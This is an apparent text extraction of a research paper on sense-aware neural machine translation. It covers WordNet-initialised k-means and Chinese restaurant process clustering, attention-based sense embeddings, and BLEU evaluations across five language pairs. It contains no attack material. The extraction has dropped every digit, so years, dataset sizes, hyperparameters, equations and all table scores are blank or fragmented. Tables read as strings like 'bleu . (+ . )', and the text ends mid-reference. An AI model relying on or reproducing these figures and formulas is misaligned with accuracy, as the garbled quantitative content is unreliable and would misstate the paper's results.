al., ) and up to a thousand words in semeval (moro and navigli, ). in contrast, our method does not require labeled texts for training, and applies to all word types with multiple senses in wordnet (e.g., nearly , for some data sets; see table later in this paper). on the other hand, unsupervised methods often predefine the number of possible senses for all ambiguous words before clustering their occur- rences, and do not adapt to what is actually ob- served in the data; as a result, the senses are often too fine-grained for the needs of mt, especially for a particular domain. in contrast, our model learns the number of senses for each analyzed ambiguous word directly from the data. . definitions and notations for each noun or verb type wt appearing in the training data, as identified by the stanford pos tagger, we extract the senses associated to it in wordnet (fellbaum, ) using nltk. www.cs.york.ac.uk/semeval _wsi. nlp.stanford.edu/software. wordnet.princeton.edu/. www.nltk.org/howto/wordnet.html. www.cs.york.ac.uk/semeval _wsi nlp.stanford.edu/software wordnet.princeton.edu/ www.nltk.org/howto/wordnet.html specifically, we extract the set of definitions dt = {dtj|j = , . . . ,mt} and the set of examples of use et = {etj|j = , . . . ,nt}, each of them containing multiple words. most of the senses are accompanied by a definition, but only about half of them also include an example of use. definitions dtj and examples etj are repre- sented by vectors defined as the average of the word embeddings over all the words constitut- ing them (except stopwords). formally, these vec- tors are dtj = ( ∑ wl∈dtj wl)/|dtj| and etj = ( ∑ wl∈e′tj wl)/|e′tj|, respectively, where |dtj| is the number of tokens of the definition. although the entire definition dtj is used to build the dtj vector, we do not consider all words in the example etj, but limit the sum to a fragment e′tj contained in a window of size c centered around the considered word, to avoid noise from long examples. hence, we divide by the number of words in this win- dow, noted |e′tj|. all of these word vectors wl are pre-trained word vec embeddings from google (mikolov et al., ). if dim is the dimensional- ity of the word vector space, then all vectors wl, dtj, and etj are in rdim . each definition vector dtj or example vector etj for a word type wt is considered as a center vector for each sense dur- ing the clustering procedure. turning now to tokens, each word occurrence wi in a source sentence is represented by the av- erage vector ui of the words from its context, that is, a window of c words centered on wi, c being an even number. we calculate the vector ui for wi by averaging vectors from c/ words before wi and from c/ words after it. we stop nevertheless at the sentence boundaries, and filter out stopwords before averaging. . clustering word occurrences by sense we adapt three clustering algorithms to our needs for wsd applied to nmt. the objective is to cluster all occurrences wi of a given word type wt, represented as word vectors ui, according to the similarity of their senses, as inferred from the similarity of the context vectors. we compare the algorithms empirically in § . k-means clustering. the original k-means al- gorithm (macqueen, ) aims to partition a set of items, which are here tokens w ,w , . . . ,wn of the same word type wt, represented through their code.google.com/archive/p/word vec/. embeddings u ,u , . . . ,un where ui ∈ rdim . the goal of k-means is to partition (or cluster) these vectors into k sets s = {s ,s , . . . ,sk} so as to minimize the within-cluster sum of squared distances to each centroid µi: s = arg min s k∑ i= ∑ u∈si ||u−µi|| ( ) at the first iteration, when there are no clusters yet, the algorithm selects k random points as centroids of the k clusters. then, at each subsequent itera- tion t, the algorithm calculates for each candidate cluster a new centroid of the observations, defined as their average vector, as follows: µt+ i = |sti| ∑ uj∈sti uj ( ) in an earlier application of k-means to phrase- based statistical mt, but not neural mt, we made several modifications to the original k-means al- gorithm to make it adaptive to the word senses observed in training data (pu et al., ). we maintain these changes and summarize them briefly here. the initial number of clusters kt for each ambiguous word type wt is set to the number of its senses in wordnet, either considering only the senses that have a definition or those that have an example. the centroids of the clusters are ini- tialized to the vectors representing the senses from wordnet, either using their definition vectors dtj or their example vectors etj. these initializations are thus a form of weak supervision of the cluster- ing process. finally, and most importantly, after running the k-means algorithm, the number of clusters for each word type is reduced by removing the clusters that contain fewer than tokens and as- signing their tokens to the closest large cluster. “closest” is defined in terms of the cosine distance between ui and their centroids. the final number of clusters thus depends on the observed occur- rences in the training data (which are the same data as for mt), and avoids modeling infrequent senses that are difficult to translate anyway. when used in nmt, in order to assign each new token from the test data to a cluster (i.e., to perform wsd), we select the closest centroid, again in terms of cosine distance. chinese restaurant process. the chinese restaurant process (crp) is an unsupervised code.google.com/archive/p/word vec/ method considered as a practical interpretation of a dirichlet process (ferguson, ) for non- parametric clustering. in the original analogy, each token is compared to a customer in a restaurant, and each cluster is a table where customers can be seated. a new customer can choose to sit at a table with other customers, with a probability proportional to the numbers of customers at that table, or sit at a new, empty table. in an appli- cation to multisense word embeddings, li and jurafsky ( ) proposed that the probability to “sit at a table” should also depend on the con- textual similarity between the token and the sense modeled by the table. we build upon this idea and bring several modifications that allow for an instantiation with sense-related knowledge from wordnet, as follows. for each word type wt appearing in the data, we start by fixing the maximal number kt of senses or clusters as the number of senses of wt in wordnet. this avoids an unbounded number of clusters (as in the original crp algorithm) and the risk of cluster sparsity by setting a non-arbitrary limit based on linguistic knowledge. moreover, we define the initial centroid of each cluster as the word vector corresponding either to the definition dtj of the respective sense, or alternatively to the example etj illustrating the sense. for each token wi and its context vector ui the algorithm decides whether the token is assigned to one of the sense clusters sj to which previous to- kens have been assigned, or whether it is assigned to a new empty cluster, by selecting the option that has the highest probability, which is computed as follows: p ∝   nj(λ s(ui,dtj) + λ s(ui,µj)) if nj = (non-empty sense) γs(ui,dtj) if nj = (empty sense) ( ) in other words, for a non-empty sense, the proba- bility is proportional to the popularity of the sense (number of tokens it already contains, nj) and to the weighted sum of two cosine similarities s(·, ·): one between the context vector ui of the token and the definition of the sense dtj, and another one between ui and the average context vector of the tokens already assigned to the sense (µj). these terms are weighted by the two hyper-parameters λ and λ . for an empty sense, only the second term is used, weighted by the γ hyper-parameter. random walks. finally, we also consider for comparison a wsd method based on random walks on the wordnet knowledge graph (agirre and soroa, ; agirre et al., ) available from the ukb toolkit. in the graph, senses cor- respond to nodes and the relationships or depen- dencies between pairs of senses correspond to the edges between those nodes. from each input sen- tence, we extract its content words (nouns, verbs, adjectives, and adverbs) that have an entry in the wordnet weighted graph. the method calculates the probability of a random walk over the graph from a target word’s sense ending on any other sense in the graph, and determines the sense with the highest probability for each analyzed word. in this case, the random walk algorithm is pagerank (grin and page, ), which computes a relative structural importance or “rank” for each node. integration with neural mt . baseline neural mt model we now present several models integrating wsd into nmt, starting from an attention-based nmt baseline (bahdanau et al., ; luong et al., ). given a source sentence x with words wx, x = (wx ,w x , ...,w x t ), the model computes a con- ditional distribution over translations, expressed as p(y = (wy ,w y , ...,w y t ′)|x). the neural net- work model consists of an encoder, a decoder, and an attention mechanism. first, each source word wxt ∈ v is projected from a one-hot word vec- tor into a continuous vector space representation xt. then, the resulting sequence of word vectors is read by the bidirectional encoder, which con- sists of forward and backward recurrent networks (rnns). the forward rnn reads the sequence in left-to-right order (i.e., −→ h t = −→ φ ( −→ h t− ,xt)), and the backward rnn reads it right-to-left ( ←− ht =←− φ ( ←− ht+ ,xt)). the hidden states from the forward and back- ward rnns are concatenated at each time step t to form an “annotation” vector ht = [ −→ ht; ←− ht]. taken over several time steps, these vectors form the “context”—that is, a tuple of annotation vectors c = (h ,h , ...,ht). the recurrent activation ixa .si.ehu.es/ukb. strictly speaking, this is the only genuine wsd method, as the two previous ones pertain to sense induction rather than disambiguation. however, for simplicity, we will refer to all of them as wsd. ixa .si.ehu.es/ukb functions −→ φ and ←− φ are either long short-term memory units (lstm) or gated recurrent units (gru). the decoder rnn maintains an internal hidden state zt′. after each time step t′, it first uses the attention mechanism to weight the annotation vec- tors in the context tuple c. the attention mecha- nism takes as input the previous hidden state of the decoder and one of the annotation vectors, and returns a relevance score et′,t = fatt(zt′− ,ht). these scores are normalized to obtain attention scores: αt′,t = exp(et′,t)/ t∑ k= exp(et′,k) ( ) these scores serve to compute a weighted sum of annotation vectors ct′ = ∑t t= αt′,tht, which are used by the decoder to update its hidden state: zt′ = φz(zt′− ,yt′− ,ct′) ( ) similarly to the encoder, φz is implemented as either an lstm or gru and yt′− is the target- side word embedding vector corresponding to word wy. . sense-aware neural mt models to model word senses for nmt, we concate- nate the embedding of each token with a vector representation of its sense, either obtained from one of the clustering methods presented in § , or learned during encoding, as we will explain. in other words, the new vector w′i represent- ing each source token wi consists of two parts: w′i = [wi ; µi], where wi is the word embed- ding learned by the nmt, and µi is the sense em- bedding obtained from wsd or learned by the nmt. to represent these senses, we create two dictionaries, one for words and the other one for sense labels, which will be embedded in a low- dimensional space, before the encoder. we pro- pose several models for using and/or generating sense embeddings for nmt, named and defined as follows. top sense (top). in this model, we directly use the sense selected for each token by one of the wsd systems above, and use the embeddings of the respective sense as generated by nmt after training. weighted average of senses (avg). instead of fully trusting the decision of a wsd sys- tem (even one adapted to mt), we consider all listed senses and the respective cluster centroids learned by the wsd system. then we convert the distances dl between the input token vector and the centroid of each sense sl into a normalized weight distribution either by a linear or a logistic normalization: ωj = −dj∑ ≤l≤k dl or ωj = e −d j∑ ≤l≤k e −d l ( ) where k is the total number of senses of token wi. the sense embedding for each token is computed as the weighted average of all sense embeddings: µi = ∑ ≤j≤k ωjµij ( ) attention-based sense weights (att). in- stead of obtaining the weight distribution from the centroids computed by wsd, we also propose to dynamically compute the probability of related- ness to each sense based on the current word and sense embeddings during encoding, as follows. given a token wi, we consider all the other tokens in the sentence (w , . . . ,wi− ,wi+ , . . . ,wl) as the context of wi, where l is the length of the sen- tence. we define the context vector of wi as the mean of all the embeddings uj of the words wj, that is, ui = ( ∑ l =i ul)/(l− ). then, we com- pute the similarity f(ui,µij) between each sense embedding µij and the context vector ui using an additional attention layer in the network, with two possibilities that will be compared empirically: f(ui,µij) = υ t tanh(wui + uµij) ( ) or f(ui,µij) = u t i wµij ( ) the weights ωj are now obtained through the following softmax normalization: ωj = ef(ui,µij)∑ ≤l≤k e f(ui,µil) ( ) finally, the average sense embedding is obtained as in equation ( ), and is concatenated to the word vector ui. att model with initialization of embed- dings (attini ). the fourth model is similar to the att model, with the difference that we initial- ize the embeddings of the source word dictionary using the word vec vectors of the word types, and the embeddings of the sense dictionary using the centroid vectors obtained from k-means. tl train dev test labels words nouns verbs fr . m k k , , , . m , , , , , de . m k k , , , . m , , , , , es . m k k , , , . m , , , , , zh . m k k , , , nl . m k k , , , table : size of data sets used for machine translation from english to five different target languages (tl). fr = french; de = german; es = spanish; zh = chinese; nl = dutch. data, metrics, and implementation data sets. we train and test our sense-aware mt systems on the data shown in table : the un corpus (rafalovitch and dale, ) and the europarl corpus (koehn, ). we first exper- iment with our models using the same data set and protocol as in our previous work (pu et al., ), to enable comparisons with phrase-based statistical mt systems, for which the sense of each ambiguous source word was modeled as a factor. moreover, in order to make a better comparison with other related approaches, we train and test our sense-aware nmt models on large data sets from workshop on statistical machine transla- tion (wmt) shared tasks over three language pairs (en/de, en/es, and en/fr). the data set used in our previous work con- sists of k parallel sentences for each language pair, k for development and k for testing. the data originates from un for en/zh, and from europarl for the other pairs. the source sides of these sets contain around , different english word forms (after lemmatization) that have more than one sense in wordnet. our wsd system gen- erates ca. . k different noun labels and . k verb labels for these word forms. the wmt data sets additionally used in this pa- per are the following ones. first, we use the com- plete en/de set from wmt (bojar et al., ) with a total of ca. . m sentence pairs. in this case, the development set is newstest , and the testing set is made of newstest and www.uncorpora.org. www.statmt.org/europarl. . second, for en/fr and en/es, we use data from wmt (bojar et al., ) with . m sentences for en/fr and . m sentences for en/es. here, the development sets are newstest and , and the testing sets are newstest and for both language pairs. the source sides of these larger additional sets contain around , unique english word forms with more than one sense in wordnet, and our system generates ca. k different noun labels and . k verb labels for each set. finally, for comparison purposes and model se- lection, we use the wit corpus (cettolo et al., ), a collection of transcripts of ted talks. we use k sentence pairs for training, k for devel- opment and k for testing. pre-processing. before assigning sense la- bels, we tokenize all the texts and identify the parts of speech using the stanford pos tagger. then, we filter out the stopwords and the nouns that are proper names according to the stanford name entity recognizer. furthermore, we con- vert the plural forms of nouns to their singular forms and the verb forms to infinitives using the stemmer and lemmatizer from nltk, which is essential because wordnet has description entries only for base forms. the pre-processed text is used for as- signing sense labels to each occurrence of a noun or verb that has more than one sense in wordnet. k-means settings. unless otherwise stated, we adopt the following settings in the k-means algorithm, with the implementation provided in scikit-learn (pedregosa et al., ). we use the definition of each sense for initializing the cen- troids, and later compare this choice with the use of examples. we set kt, the initial number of clus- ters, to the number of wordnet senses of each am- biguous word type wt, and set the window size for the context surrounding each occurrence to c = . neural mt. we build upon the attention- based neural translation model (bahdanau et al., ) from the opennmt toolkit (klein et al., ). we use lstm and not gru. for the proposed att and attini models, we add an we selected the data from different years of wmt be- cause the en/fr and en/es pairs were only available in wmt . wit .fbk.eu. nlp.stanford.edu/software. www.nltk.org. www.opennmt.net. www.uncorpora.org www.statmt.org/europarl wit .fbk.eu nlp.stanford.edu/software www.nltk.org www.opennmt.net external attention layer before the encoder, but do not otherwise alter the internals of the nmt model. we set the source and target vocabulary sizes to , and the dimension of word embeddings to , which is recommended for opennmt, so as to reach a strong baseline. for the attini model, because the embeddings from word vec used for initialization have only dimensions, we randomly pick up a vector with dimen- sions within range [− . , . ] and concatenate it with the vector from word vec to reach the re- quired number of dimensions, ensuring a fair comparison. it takes around epochs ( – hours on idiap’s gpu cluster) to train each of the five nmt models: the baseline and our four proposals. the avg model takes more time for training (around hours) because we use additional weights and senses for each token. in fact, we limit the number of senses for avg to per word type, after ob- serving that in wordnet there are fewer than words with more than senses. evaluation metrics. for the evaluation of in- trinsic wsd performance, we use the v -score, the f -score, and their average, as used for in- stance at semeval (manandhar et al., ). the v -score is the weighted harmonic mean of homogeneity and completeness (favoring systems generating more clusters than the reference), and the f -score measures the classification perfor- mance (favoring systems generating fewer clus- ters). therefore, the ranking metric for semeval is the average of the two. we select the optimal model configuration based on mt performance on development sets, as measured with the traditional multi-bleu score (papineni et al., ). moreover, to estimate the impact of wsd on mt, we also measure the actual impact on the nouns and verbs that have several wordnet senses, by counting how many of them are translated exactly as in the reference transla- tion. to quantify the difference with the baseline, we use the following coefficient. first, for a cer- tain set of tokens in the source data, we note as nimproved the number of tokens that are translated by our system with the same token as in the ref- erence translation, but are translated differently by the baseline system. conversely, we note as ndegraded the number of tokens that are translated by the baseline system as in the reference, but dif- ferently by our system. we use the normalized coefficient ρ = (nimproved−ndegraded)/t , where t is the total number of tokens, as a metric to specifically evaluate the translation of words sub- mitted to wsd. for all tables we mark in bold the best score per condition. for mt scores in tables , , and , we show the improvement over the baseline and its significance based on two confidence levels: either p < . (indicated with a ‘†’) or p < . (‘‡’). any p-values larger than . are treated as not significant and are left unmarked. optimal values of the parameters . best wsd method based on bleu we first select the optimal clustering method and its initialization settings, in a series of experiments with statistical mt over the wit corpus, ex- tending and confirming our previous results (pu et al., ). in table , we present the bleu and ρ scores of our previous wsd+smt system for the three clustering methods, initialized with vec- tors either from the wordnet definitions or from examples, for two language pairs. we also pro- vide bleu scores of baseline systems and of ora- cle ones (i.e., using correct senses as factors). the best method is k-means and the best initialization is with the vectors of definitions. all values of ρ show improvements over the baseline, with up to % for k-means on de/en. moreover, we found that random initializations underperform with respect to definitions or exam- ples. for a fair comparison, we set the number of clusters equal either to the number of synsets with definitions or with examples, for each word type, and obtained bleu scores on en/zh of . and . , respectively—hence lower than . and . in table . we investigated earlier (pu et al., ) the effect of the context window surround- ing each ambiguous token, and found with the wsd+smt factored system on en/zh wit data that the optimal size was , which we use here as well. . best wsd method based on v/f scores table shows our wsd results in terms of v - score and f -score, comparing our methods (six the values of nimproved and ndegraded are obtained using automatic word alignment. they do not capture, of course, the intrinsic correctness of a candidate translation, but only its identity or not with one reference translation. pair initialization bleu ρ (%) baseline graph crp k-means oracle graph crp k-means en/zh definitions . . . . . + . + . + . examples . . . + . + . en/de definitions . . . . . − . − . + . examples . . . − . + . table : performance of the wsd+smt factored system for two language pairs from wit , with three clustering methods and two initializations. system v-score f -score average c all nouns verbs all nouns verbs all nouns verbs uoy . . . . . . . . . . kcdc-gd . . . . . . . . . . duluth-mix-gap . . . . . . . . . . k-means+definitions . . . . . . . . . . k-means+examples . . . . . . . . . . crp + definitions . . . . . . . . . . crp + examples . . . . . . . . . . graph + definitions . . . . . . . . . . graph + examples . . . . . . . . . . table : wsd results from three semeval systems and our six systems, in terms of v -score, f score, and their average. c = the average number of clusters. the adaptive k-means using definitions outperforms the others on the average of v and f , when considering both nouns and verbs, or nouns only. the semeval systems are uoy (korkontzelos and manandhar, ); kcdc-gd (kern et al., ); and duluth-mix-gap (pedersen, ). lines at the bottom) with other significant systems that participated in the semeval shared task (manandhar et al., ). the adaptive k-means initialized with definitions has the highest average score ( . ) and ranks among the top systems for most of the metrics individually. moreover, the adaptive k-means method finds on average . senses per word type, which is very close to the ground-truth value of . . overall, we observed that k-means infers fewer senses per word type than wordnet. these results show that k-means wsd is effective and provides competitive per- formance against other weakly supervised alter- natives (crp or random walk) and even against semeval wsd methods, but using additional knowledge not available to semeval participants. . selection of wsd+nmt model to compare several options of the wsd+nmt systems, we trained and tested them on a sub- set of en/fr europarl (a smaller data set short- ened the training times). the results are shown we provide comparisons with more systems from semeval in our previous paper (pu et al., ). system and settings bleu baseline . top . (+ . ) avg with linear norm. in eq. ( ) . (+ . ) avg with logistic norm. in eq. ( ) . (+ . ) att with null label . (+ . ) att with word used as label . (+ . ) attini with uti wµij in eq. ( ) . (+ . ) attini with tanh in eq. ( ) . (+ . ) table : performance of various wsd+nmt configu- rations on a en/fr subset of europarl, with variations with respect to baseline. we select the settings with the best performance (bold) for our final experiments in § . in table . for the avg model, the logistic normal- ization in equation ( ) works better than the linear one. for the att model, we compared two dif- ferent labeling approaches for tokens that do not have multiple senses: either use the same null label for all tokens, or use the word itself as a label for its sense; the second option appeared to be the best. finally, for the attini model, we compared the two options for the attention function in equa- tion ( ), and found that the formula with tanh is the best. in what follows, we use these settings for the avg and att systems. en/fr en/de en/zh en/es en/nl smt baseline . . . . . graph . (+. ) . (+. ) . (+. ) . (+. ) . (+. ) crp . (+. ) . (+. ) † . (+. ) . (+. ) . (+. ) k-means . (+. ) . (+. ) † . (+. ) † . (+. ) † . (+. ) nmt baseline . . . . . k-means + top . (−. ) . (+. ) . (−. ) . (+. ) . (−. ) k-means + avg . (+. ) † . (+. ) † . (+. ) . (+. ) ‡ . (+. ) none + att . (+. ) ‡ . (+. ) ‡ . (+. ) † . (+. ) ‡ . (+. ) † k-means + attini . (+ . ) ‡ . (+. ) ‡ . (+. ) ‡ . (+ . ) ‡ . (+. ) ‡ table : bleu scores of our sense-aware nmt systems over five language pairs: attini is the best one among smt and nmt systems. significance testing is indicated by † for p < . and ‡ for p < . . results we first evaluate our sense-aware models with smaller data sets (ca. k lines) for five language pairs with english as source. we evaluate them through both automatic measures and human as- sessment. later on, we evaluate our sense-aware nmt models with larger wmt data sets to enable a better comparison with other related approaches. bleu scores. table displays the perfor- mance of both sense-aware phrase-based and neu- ral mt systems with the training sets of k lines listed in table on five language pairs. specifically, we compare several approaches that integrate word sense information in smt and nmt. the best hyper-parameters are those found above, for each of the wsd+nmt combina- tion strategies, in particular the k-means method for wsd+smt, and the attini method for wsd+nmt—that is, the attention-based model of senses initialized with the output of k-means clustering. comparisons with baselines. table shows that our wsd+nmt systems perform consistently better than the baselines, with the largest improve- ments achieved by nmt on en/fr and en/es. the neural systems outperform the phrase- based statistical ones (pu et al., ), which are shown for comparison in the upper part of the table. we compare our proposal to the recent system proposed by yang et al. ( ), on the k-line en/fr europarl data set (the differences between their system and ours are listed in § ). we care- fully implemented their model by following their paper, since their code is not available. using the sense embeddings of the multi-sense skip-gram model (mssg) (neelakantan et al., ) as they do, and training for six epochs as in their study, our implementation of their model reaches only . bleu points. when increasing the train- ing stage until convergence ( epochs), the best bleu score is . , which is still below our nmt baseline of . . we also found that the ini- tialization of embeddings with mssg brings less than bleu point improvement with respect to random initializations (which scored . over six epochs and . until convergence), while yang et al. found a . – . increase on two dif- ferent test sets. in order to better understand the difference, we tried several combinations of their model with ours. we obtain a bleu score of . by replacing their mssg sense specifica- tion model with our adaptive k-means approach, and a bleu score of . by replacing our context calculation method (averaging word em- beddings within one sentence) with their context vector generation method, which is computed from the output of a bi-directional rnn. in the end, the best bleu score on this en/fr data set ( . as shown in table , column , last line) is reached by our system with its best options. lexical choice. using word alignment, we assess the improvement brought by our systems with respect to the baseline in terms of the number of words—here, wsd-labeled nouns and verbs— that are translated exactly as in the reference trans- lation (modulo alignment errors). these numbers can be arranged in a confusion matrix with four values: the words translated correctly (i.e., as in the reference) by both systems, those translated correctly by one system but incorrectly by the other one, and vice versa, and those translated incorrectly by both. table shows the confusion matrix for our sense-aware nmt with the attini model versus baselines en/fr en/es correct incorrect correct incorrect wsd+ c. , , , , nmt i. , , , , wsd+ c. , , , , smt i. , , , , table : confusion matrix for our wsd+nmt (attini ) system and our wsd+smt system against their respective baselines (nmt and smt), over the europarl test data, for two language pairs. the nmt baseline over the europarl test data. the net improvement (i.e., the fraction of words improved by our system minus those degraded ) appears to be + . % for en/fr and + . % for en/es. for comparison, we show the results of the wsd+smt system versus the smt baseline in the lower part of table : the improvement is smaller, at + . % for en/fr and + . % for en/es. therefore, the attini nmt model brings higher benefits over the nmt baseline than the wsd+smt factored model, although the nmt base- line is stronger than the smt one (see table ). human assessment. to compare our systems against baselines, we also consider a human eval- uation of the translation of words with multiple senses (nouns or verbs). the goal is to capture more precisely the correct translations that are, however, different from the reference. given the cost of the procedure, one evaluator with good knowledge of en and fr rated the trans- lations of four word types that appear frequently in the test set and have multiple possible senses and translations into french. these words are: deal ( tokens), face ( ), mark ( ), and subject ( ). two translations of deal are exemplified in § . for each occurrence, the evaluator sees the source sentence, the reference translation, and the outputs of the nmt baseline and the attini in random order, so that the system cannot be identi- fied. the two translations of the considered word are rated as good, acceptable, or wrong. we sub- mit only cases in which the two translations differ, to minimize the annotation effort with no impact on the comparison between systems. explicitly, improvements are (system-correct & baseline-incorrect) minus (system-incorrect & baseline- correct), and degradations the converse difference. deal face mark subject candidate . . . . . . p ro p o rt io n - good - acceptable - wrong baseline our method deal face mark subject candidate . . . . . . p ro p o rt io n o > b o = b o < b (a) system ratings. (b) comparative scores. figure : human comparison of the en/fr transla- tions of four word types. (a) proportion of good (light gray), acceptable (middle gray), and wrong (dark gray) translations per word and system (baseline left, attini right, for each word). (b) proportion of translations in which attini is better (light gray), equal (middle gray), or worse (dark gray) than the baseline. firstly, figure (a) shows that attini has a higher proportion of good translations, and a lower proportion of wrong ones, for all four words. the largest difference is for subject, where attini has % good translations and the baseline only %; moreover, the baseline has % errors and attini has only %. secondly, figure (b) shows the proportions of tokens, for each type, for which attini was respectively better, equal, or worse than the baseline. again, for each of the four words, there are far more improvements brought by attini than degradations. on average, % of the occurrences are improved and only % are degraded. results on wmt data sets. to demonstrate that our findings generalize to larger data sets, we report results on three data sets provided by the wmt conference (see § ), namely, for en/de, en/es and en/fr. tables and show the results of our proposed nmt models on these test sets. the results in table confirm that our sense-aware nmt models improve significantly the transla- tion quality also on larger data sets, which permit stronger baselines. comparing these results with the ones from table , we even conclude that our models trained on larger, mixed-domain data sets achieve higher improvements than the models trained on smaller, domain-specific data sets (europarl). this clearly shows that our sense-aware nmt models are beneficial on both narrow and broad domains. finally, we compare our model with several recent nmt models that make use of contex- tual information, thus sharing a similar overall goal to our study. indeed, the model proposed by en/fr en/es nt nt nt nt baseline . . . . none + att . (+. ) . (+. ) † . (+. ) † . (+. ) ‡ k-means + attini . (+ . ) ‡ . (+. . ) ‡ . (+ . ) ‡ . (+ . ) ‡ table : bleu scores on wmt newstest and (nt) test sets for two language pairs. significance testing is indicated by † for p < . and ‡ for p < . . nmt model nt nt context-dependent (choi et al., ) - . context-aware (zhang et al., ) . - self-attentive (werlen et al., ) . . baseline . . none + att . † . k-means + attini . (+ . ) ‡ . (+ . ) ‡ table : bleu score on english-to-german translation over the wmt newstest (nt) and test sets. significance testing is indicated by † for p < . and ‡ for p < . . the highest score per column is in bold. choi et al. ( ) attempts to improve nmt by integrating context vectors associated to source words into the generation process during decod- ing. the model proposed by zhang et al. ( ) is aware of previous attended words on the source side in order to better predict which words will be attended in future. the self-attentive residual decoder designed by werlen et al. ( ) lever- ages the contextual information from previously translated words on the target side. bleu scores on the english–german pair shown in table demonstrate that our baseline is strong and that our model is competitive with respect to recent mod- els that leverage contextual information in differ- ent ways. related work word sense disambiguation aims to identify the sense of a word appearing in a given context (agirre and edmonds, ). resolving word sense ambiguities should be useful, in particular, for lexical choice in mt. an initial investigation found that a statistical mt system that makes use of off-the-shelf wsd does not yield significantly better quality translations than an smt system not using it (carpuat and wu, ). however, sev- eral studies (cabezas and resnik, ; vickrey et al., ; carpuat and wu, ; chan et al., ) reformulated the task of wsd for smt and showed that integrating the ambiguity infor- mation generated from modified wsd improved smt by . – . bleu points compared with baselines. recently, tang et al. ( ) used only the super- senses from wordnet (coarse-grained semantic labels) for automatic wsd, using maximum en- tropy classification or sense embeddings learned using word vec. when combining wsd with smt using a factored model, tang et al. improved bleu scores by . points on average, though with large differences between their three test sub- sets (it q&a pairs). although these reformulations of the wsd task proved helpful for smt, they did not determine whether actual source-side senses are helpful or not for end-to-end smt. xiong and zhang ( ) attempted to answer this question by performing self-learned word sense induction instead of us- ing pre-specified word senses as traditional wsd does. however, they created the risk of discover- ing sense clusters that do not correspond to the senses of words actually needed for mt. hence, they left open an important question, namely, whether wsd based on semantic resources such as wordnet (fellbaum, ) can be successfully integrated with smt. several studies integrated sense information as features to smt, either obtained from the sense graph provided by wordnet (neale et al., ) or generated from both sides of word dependen- cies (su et al., ). however, apart from the sense graph, wordnet also provides textual infor- mation such as sense definitions and examples, which should be useful for wsd, but were not used in these studies. in previous work (pu et al., ), we used this information to perform sense induction on source-side data using k-means and demonstrated improvement with factored phrase- based smt but not nmt. neural mt became the state of the art (sutskever et al., ; bahdanau et al., ). instead of working directly at the discrete sym- bol level as smt, it projects and manipulates the source sequence of discrete symbols in a continu- ous vector space. however, nmt generates only one embedding for each word type, regardless of its possibly different senses, as analyzed, for example, by hill et al. ( ). several studies pro- posed efficient nonparametric models for mono- lingual word sense representation (neelakantan et al., ; li and jurafsky, ; bartunov et al., ; liu et al., ), but left open the question whether sense representations can help neural mt by reducing word ambiguity. recent studies integrate the additional sense assignment with neural mt based on these approaches, either by adding such sense assignments as additional features (rios et al., ) or by merging the con- text information on both sides of parallel data for encoding and decoding (choi et al., ). yang et al. ( ) recently proposed to add sense information by using weighted sense em- beddings as input to neural mt. the sense labels were generated by a mssg model (neelakantan et al., ), and the context vector used for sense weight generation was computed from the out- put of a bidirectional rnn. finally, the weighted average sense embeddings were used in place of the word embedding for the nmt encoder. the numerical results given in § show that our options for using sense embeddings outper- form yang et al.’s proposal. in fact, their ap- proach even performed worse than the nmt baseline on our en/fr data set. we conclude that adaptive k-means clustering is better than mssg for use in nmt, and that concatenating the word embedding and its sense vector as input for the rnn encoder is better than just using the sense embedding for each token. in terms of efficiency, yang et al. ( ) need an additional bidirectional rnn to generate the context vector for each input token, whereas we compute the context vector by averaging the embeddings of the neighboring to- kens. this slows down the training of the encoder by a factor of , which may explain why they only trained their model for six epochs. conclusion we presented a neural mt system enhanced with an attention-based method to represent multi- ple word senses, making use of a larger con- text to disambiguate words that have various possible translations. we proposed several adap- tive context-dependent clustering algorithms for wsd and combined them in several ways with nmt—following our earlier experiments with smt (pu et al., )—and found that they had competitive wsd performance on data from the semeval shared task. for nmt, the best-performing method used the output of k-means to initialize the sense embed- dings that are learned by our system. in partic- ular, it appeared that learning sense embeddings for nmt is better than using embeddings learned separately by other methods, although such em- beddings may be useful for initialization. our ex- periments with five language pairs showed that our sense-aware nmt systems consistently improve over strong nmt baselines, and that they specifi- cally improve the translation of words with multi- ple senses. in the future, our approach to sense-aware nmt could be extended to other nmt architec- tures such as the transformer network proposed by vaswani et al. ( ). as was the case with the lstm-based architecture studied here, the transformer network does not explicitly model or utilize the sense information of words, and, therefore, we hypothesize that its performance could also be improved by using our sense in- tegration approaches. to encourage further re- search in sense-aware nmt, our code is made available at https://github.com/idiap/ sense_aware_nmt. acknowledgments the authors are grateful for support from the swiss national science foundation through the modern sinergia project on modeling dis- course entities and relations for coherent machine translation, grant no. (www. idiap.ch/project/modern), and from the european union through the summa hori- zon project on scalable understanding of multilingual media, grant no. (www. summa-project.eu). the authors would like to thank the tacl editors and reviewers for their helpful comments and suggestions. https://github.com/idiap/sense_aware_nmt https://github.com/idiap/sense_aware_nmt www.idiap.ch/project/modern www.idiap.ch/project/modern www.summa-project.eu www.summa-project.eu references eneko agirre and philip edmonds. . word sense disambiguation: algorithms and appli- cations. springer-verlag, berlin, germany. eneko agirre, oier lópez de lacalle, and aitor soroa. . random walks for knowledge- based word sense disambiguation. computa- tional linguistics, ( ): – . eneko agirre and aitor soroa. . personaliz- ing pagerank for word sense disambiguation. in proceedings of the th conference of the european chapter of the association for com- putational linguistics (eacl), pages – , athens, greece. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in pro- ceedings of the international conference on learning representations, san diego, ca, usa. sergey bartunov, dmitry kondrashkin, anton osokin, and dmitry vetrov. . breaking sticks and ambiguities with adaptive skip- gram. in artificial intelligence and statistics, pages – . ondřej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint-amand, radu soricut, lucia specia, and aleš tamchyna. . findings of the workshop on statis- tical machine translation. in proceedings of the ninth workshop on statistical machine trans- lation, pages – , baltimore, maryland, usa. ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, matthias huck, antonio jimeno yepes, philipp koehn, varvara logacheva, christof monz, matteo negri, aurelie neveol, mariana neves, martin popel, matt post, raphael rubino, carolina scarton, lucia specia, marco turchi, karin verspoor, and marcos zampieri. . findings of the conference on machine translation. in pro- ceedings of the first conference on machine translation, pages – , berlin, germany. clara cabezas and philip resnik. . using wsd techniques for lexical selection in sta- tistical machine translation. technical report, dtic document. marine carpuat and dekai wu. . word sense disambiguation vs. statistical machine translation. in proceedings of the rd annual meeting of the association for computational linguistics, pages – , michigan, mi, usa. marine carpuat and dekai wu. . improv- ing statistical machine translation using word sense disambiguation. in proceedings of the joint conference on empirical methods in natural language processing and compu- tational natural language learning 